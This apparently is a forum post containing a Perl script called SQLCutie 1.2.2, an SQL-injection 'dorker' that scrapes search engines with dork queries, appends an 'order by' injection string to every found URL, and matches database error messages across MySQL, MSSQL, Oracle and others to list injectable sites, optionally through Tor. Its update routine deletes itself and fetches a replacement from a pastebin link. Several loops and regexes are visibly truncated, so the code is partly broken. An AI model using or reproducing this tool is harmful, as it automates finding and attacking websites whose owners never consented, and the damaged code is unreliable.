13 Years of Service
24%
Code:
>#!/usr/bin/perl --
=for comment
*-----------------------------------------------------------*
| |
| SQLCutie 1.2.2 |
| by MadFedora |
| |
| *Faster dorking |
| *Fixed Error Parsing |
| *Update function fixed |
| *Execution fixed |
| *TOR install |
| |
| This is the separated dorker version of SQLCute |
| With accurated vuln finding and wider DB ranges |
| |
| This script is constantly updated, check update |
| function in help menu. |
*-----------------------------------------------------------*
=cut
use LWP::UserAgent;
use HTTP::Request;
use Term::ANSIColor qw(:constants);
#-----------------------------------------------------------#
# Help menu #
#-----------------------------------------------------------#
sub help
{
system('clear');
system('title SQLCutie 1.2.2');
print BLUE, "[!] Usage : $0 \n";
print GREEN, "-----------------------------------";
print BOLD, GREEN, "\n--|| Options\n\n", RESET;
print GREEN, " --dork Dorking function (dorkhelp)\n";
print GREEN, " --proxy Define a proxy to use (proxyhelp)\n";
print " --output Save scan result in an outside file\n";
print " --help Print this help manual\n";
print " --readme README\n";
print " --dorkhelp Print dork help manual\n";
print " --proxyhelp Print proxy help manual\n";
print " --update Update to latest version\n";
print "-----------------------------------\n", RESET;
exit();
}
sub readme
{
system('clear');
system('title SQLCutie 1.2.2');
print BOLD,GREEN," \n SQLCutie ",YELLOW,"1.2.2\n",RESET;
print "This project was started at ",YELLOW,"09/20/2013\n",RESET;
print GREEN,"Improvement: \n",RESET;
print BLUE,"-- Over 10 types of DB\n";
print "-- Better dork response\n";
print "-- More accurated error responses\n";
print "-- Better help UI\n";
print "-- Update support\n";
print "-- Still working on Bing dorking\n";
print BOLD,"-- Added TOR installation options\n";
print "-- Fixed update problem\n",RESET;
print BOLD, GREEN, "If anyone looking toward to improve this piece of crap\nFeel free to do so!\n",RESET;
print BLUE,"$0 --help\n\n",RESET;
exit();
}
sub dorkhelp
{
system('clear');
system('title SQLCutie 1.2.2');
print GREEN, "\n[?] Example: ./sqlcutie php?id=\n";
print " ./sqlcutie php?id=+ottawa\n";
print " ./sqlcutie inurl:php?id=+intitle:ottawa\n";
print " ./sqlcutie intext:world+filetype:pl\n";
print " ./sqlcutie funny+AND+joyful+asp?id=\n",RESET;
print YELLOW,"[!] You can use basically any Google dork query except brackets\n",RESET;
print BLUE,"$0 --help\n\n",RESET;
exit();
}
sub proxyhelp
{
system('clear');
system('title SQLCutie 1.2.2');
print GREEN,"\n[?] Example: ./sqlcutie --proxy ",BOLD,"http://127.0.0.1:9050/\n",RESET;
print GREEN,"To install TOR: $0 --tor\n",RESET;
print BLUE,"$0 --help\n\n",RESET;
exit();
}
sub update
{
system('clear');
system('title SQLCutie 1.2.2');
print GREEN,"\n[!] Updating...\n";
system('rm -r sqlcutie ; wget http://pastebin.com/raw.php?i=NdVZ5HVX -O ./sqlcutie ; chmod u+x ./sqlcutie ; dos2unix ./sqlcutie');
print BOLD,"";
system('echo "For what changed run: ./sqlcutie --readme"');
print "\n",RESET;
exit();
}
sub tor
{
system('clear');
system('title SQLCutie 1.2.2');
print GREEN,BOLD,"\nYou're installing TOR\nPlease enter your user password to proceed or press Ctrl C to exit\n",RESET,BLUE;
system('sudo apt-get install tor && tor');
print BOLD"\nTo use: $0 --proxy http://127.0.0.1:9050/ --dork \n",RESET;
exit();
}
sub variables
{
my $i=0;
foreach (@ARGV)
{
if ($ARGV[$i] eq "--dork"){$search_dork = $ARGV[$i+1]}
if ($ARGV[$i] eq "--output"){$vulnfile = $ARGV[$i+1]}
if ($ARGV[$i] eq "--proxy"){$proxy = $ARGV[$i+1]}
if ($ARGV[$i] eq "--help"){&help}
if ($ARGV[$i] eq "--readme"){&readme}
if ($ARGV[$i] eq "--dorkhelp"){&dorkhelp}
if ($ARGV[$i] eq "--proxyhelp"){&proxyhelp}
if ($ARGV[$i] eq "--update"){&update}
if ($ARGV[$i] eq "--tor"){&tor}
$i++;
}
}
sub main
{
system('clear');
system('title SQLCutie 1.2.2');
print GREEN, " \n--------------------------------------\n";
print BOLD," \n SQLCutie ",YELLOW,"1.2.2\n",RESET;
print BLUE," \n madfedora";
print " \n madfedora\@mail.riseup.net\n",RESET;
print GREEN," \n--------------------------------------\n\n",RESET;
if (@ARGV+1){print GREEN,"[?] For Help : ",BOLD,"$0 --help\n\n",RESET;}
}
sub vulnscanner
{
checksearch();
search1($search_dork);
search2($search_dork);
}
sub checksearch
{
#my $request = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=60");
#my $request = HTTP::Request->new(GET => "http://www.bing.com/search?q=$search_dork&qs=n&pq=$search_dork&sc=8-5&sp=-1&sk=&first=70");
#-----------------------------------------------------------#
# Change page numbers above #
#-----------------------------------------------------------#
my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/531.6.2 (KHTML, like Gecko) Version/5.1 Safari/531.6.2' || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_5 rv:6.0) Gecko/20100731 Firefox/3.6.8' || 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/5.1)');
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->request($request) ;
my $result = $response->content;
}
sub search1
{
my $dork = $_[0];
for ($i=0;$i {
my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=$i");
my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0(X11; Linux i686) AppleWebKit/5310 (KHTML, like Gecko) Chrome/13.0.889.0 Safari/5310');
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->request($request) ;
my $result = $response->content;
while ($result =~ m/class=r>/g )
{
print BLUE, "[!] Dorking > $1\n", RESET;
checkvuln($1)
}
}
}
sub search2
{
my $dork = $_[0];
for ($i=0;$i {
my $request = HTTP::Request->new(GET => "http://uk.ask.com/web?q=$dork&page=$i&dm=all");
my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0');
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->request($request) ;
my $result = $response->content;
while ($result =~ m/(.*)/gi)
{
my $askurl ="http://".$3 ;
print BLUE, "[!] Dorking > $askurl\n",RESET;
checkvuln($askurl);
}
}
}
sub checkvuln
{
my $scan_url = $_[0];
my $link = $scan_url.'0+order+by+9999999--';
my $ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $req = $ua->get($link);
my $fuzz = $req->content;
#-----------------------------------------------------------#
# MySQL #
#-----------------------------------------------------------#
if ($fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/mysql_numrow/i)
{
print BOLD, GREEN, "[!] MySQL Num Row -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/FetchRow()/i|| $fuzz =~ m/GetArray()/i )
{
print BOLD, GREEN, "[!] MySQL Fetch (Array/Row) -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Unexpected EOF found when reading file/i)
{
print BOLD, GREEN, "[!] MySQL EOF -> $scan_url\n", RESET;
print BOLD, WHITE "
[*]Possible Injection\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Triggers can not be created on system tables/i)
{
print BOLD, GREEN, "[!] MySQL NO TRIGGERS -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Can't get working directory/i)
{
print BOLD, GREEN, "[!] MySQL Directory -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i)
{
print BOLD, GREEN, "[!] MySQL Error Misc -> $scan_url\n", RESET;
print BOLD, WHITE "
[*]Possible Injection\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# Microsoft OLE/ODBC/JET [MsSQL/Access] #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/ODBC SQL Server Driver/i || $fuzz =~ m/ODBC Microsoft Access Driver/i || $fuzz =~ m/OLE DB Provider for ODBC/i)
{
print BOLD, GREEN, "[!] Microsoft ODBC [Access] -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@accessvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Microsoft OLE DB Provider for SQL Server/i || $fuzz =~ m/Unclosed quotation mark/i)
{
print BOLD, GREEN, "[!] Microsoft OLE DB [MsSQL] -> $scan_url\n", RESET;
print BOLD, WHITE "
[*]Possible Injection\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/VBScript Runtime/i)
{
print BOLD, GREEN, "[!] VBScript Runtime -> $scan_url\n", RESET;
print BOLD, YELLOW "
[*]Not Injectable\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Microsoft JET Database/i)
{
print BOLD, GREEN, "[!] Microsoft JET [Access] -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@accessvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# ADO DB #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/Invalid Querystring/i)
{
print BOLD, GREEN, "[!] ADO DB Invalid Querystring -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/ADODB.Field/i)
{
print BOLD, GREEN, "[!] ADO DB ADODB.Field -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/ADODB.Command/i )
{
print BOLD, GREEN, "[!] ADO DB ADODB.Command -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/BOF or EOF/i)
{
print BOLD, GREEN, "[!] ADO DB BOF or EOF -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# PostgreSQL #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/postgresql.util/i || $fuzz =~ m/psql: could not connect to server/i || $fuzz =~ m/psql: FATAL/i || $fuzz =~ m/dynamic_result_sets_returned/i || $fuzz =~ m/null_value_eliminated_in_set_function/i || $fuzz =~ m/ERROR: invalid input syntax for integer/i )
{
print BOLD, GREEN, "[!] PosgreSQL -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# Oracle #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/oracle.jdbc/i || $fuzz =~ m/system.data.oledb/i )
{
print BOLD, GREEN, "[!] JDBC -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# Sybase #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/Warning: sybase_query()/i || $fuzz =~ m/sybase_fetch_assoc()/i )
{
print BOLD, GREEN, "[!] Sybase -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# MariaDB #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/ERROR 1712 (HY000)/i )
{
print BOLD, GREEN, "[!] MariaDB Index Corruption -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/ER_QUERY_EXCEEDED_ROWS_EXAMINED_LIMIT/i )
{
print BOLD, GREEN, "[!] MariaDB Query Excecution Corrupted -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/ER_QUERY_CACHE_IS_GLOBALY_DISABLED/i )
{
print BOLD, GREEN, "[!] MariaDB Query cache is globally disabled -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/ER_DYN_COL_IMPLEMENTATION_LIMIT/i )
{
print BOLD, GREEN, "[!] MariaDB Dynamic column implementation limit -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
}
variables();
main();
if (defined($search_dork))
{
print BOLD,GREEN,"[+] Vulnerability Scan\n" ;
print "[+] Dork : $search_dork\n\n\n",RESET;
vulnscanner();
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file @mysqlvuln;
print vuln_file @mssqlvuln;
print vuln_file @accessvuln;
close(vuln_file);
print YELLOW,"[+] Result Saved to $vulnfile\n",RESET;
exit();
if (!defined($search_dork))
{
print YELLOW,"[!] Please enter the correct query, example ",BOLD,"inurl:php?id=+world\n",RESET;
exit();
}
if (!defined($proxy))
{
print YELLOW,"[!] Please enter the correct proxy, example ",BOLD,"http://127.0.0.1:8080/\n",RESET;
exit();
}
}
}
#-----------------------------------------------------------#
# End #
#-----------------------------------------------------------#